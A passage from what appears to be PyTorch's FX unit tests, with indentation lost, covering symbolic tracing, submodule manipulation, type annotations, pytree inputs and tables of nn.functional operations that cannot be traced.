x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'linalg.multi_dot',
'norm',
'polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFunctionalTracing(JitTestCase):
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
